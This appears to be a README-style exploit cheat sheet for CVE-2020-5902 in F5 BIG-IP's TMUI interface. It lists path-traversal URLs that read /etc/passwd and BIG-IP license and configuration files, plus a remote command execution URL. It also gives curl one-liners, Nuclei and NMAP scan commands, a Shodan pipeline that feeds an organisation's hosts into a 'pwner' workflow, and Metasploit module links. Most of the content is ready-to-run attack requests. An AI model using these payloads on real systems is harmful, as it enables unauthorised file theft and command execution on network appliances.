# 🔸BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## LFI ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` ```powershell https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp ``` ```ruby https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa ``` ```bash https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license ``` ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ## RCE ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🎯 Manuel POC 🔥 ```ruby curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' ``` ```bash curl -sk 'https://{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 📜 Nuclei Detect CVE-2020-5902 https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml ```console nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt ``` ![image](https://i.ibb.co/hHsWjrk/4.png) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ![image](https://i.ibb.co/fNm0JGL/2.png) ## 🔎 NMAP Script for CVE-2020-5902 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ```powershell wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse ``` ```console nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ``` ![image](https://i.ibb.co/S0df0bk/5.png) ## 🚩CVE-2020-5902 Scanner Python Script https://github.com/dunderhay/CVE-2020-5902 https://github.com/aqhmal/CVE-2020-5902-Scanner ## 💡 Automate Find CVE-2020-5902 🔎 https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77 ```console shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml ``` ## 🔨RCE Metasploit CVE-2020-5902 https://github.com/rapid7/metasploit-framework/pull/13807# `modules/exploits/linux/http/f5_bigip_tmui_rce.rb` https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4